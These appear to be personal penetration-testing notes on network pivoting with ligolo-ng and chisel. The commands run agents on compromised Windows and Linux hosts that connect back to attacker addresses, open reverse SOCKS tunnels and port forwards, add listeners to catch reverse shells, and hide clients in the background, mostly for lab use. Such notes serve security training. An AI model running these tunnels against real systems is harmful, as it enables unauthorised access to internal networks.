隧道工具推荐

ligolo-ng

It's convenient when pivot network and excute nmap scan.And it could receive reverse shell and download file by webserver from kali.
first init:

sudo ip tuntap add user rightevil mode tun ligolo

sudo ip link set ligolo up

start in kali

./proxy -selfcert

agent connect
windows

.\agent.exe -connect 192.168.45.248:11601 -ignore-cert

linux

./agent -connect 192.168.45.153:11601 -ignore-cert

choose session

session

enum interface

ifconfig

add innet

sudo ip route add 172.16.216.0/24 dev ligolo

choose session and start tunnel connect

session

start

start scan directly

nmap -sn 172.16.1.0/24

set listener(capture reverse shell and transfer file)

listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443

listener_add --addr 0.0.0.0:81 --to 127.0.0.1:80

list listener

listener_list

chisel

!!!important!!!
the client and server version should be the same
it cant listen reverse shell in innet network!!!

Because of his niche, he is sometimes not discovered or blocked by firewalls etc.
but it spend more time when excute nmap scan,cause socks proxy just support TCP scan.and chisel cant receive reverse shell.

socks proxy

kali:

chisel server --port 8080 --reverse

target:
run in background

Start-Job -ScriptBlock { c:\my\chisel.exe client 192.168.45.223:8080 R:socks }

/tmp/chisel client 192.168.45.153:8080 R:socks > /dev/null 2>&1 &

just run

c:\my\chisel.exe client 192.168.45.223:8080 R:socks

/tmp/chisel client 192.168.45.153:8080 R:socks

then use proxy to excute command to communicate with innet network

port forward

revserse mode: share remote:port from client to server's local:port
strict mode: share remote:port from server to client's local:port
Backward joins are more common than forward joins. Because the firewall will prevent us from actively connecting to the target
server:

chisel server --port 8080 --reverse

chisel.exe server --port 8080 --reverse

client:

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 

.\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000

run in background

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 &

Start-Job -ScriptBlock { .\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000 }

more than one port

/tmp/chisel client 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.01:8443

# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack box

just add the remote_socket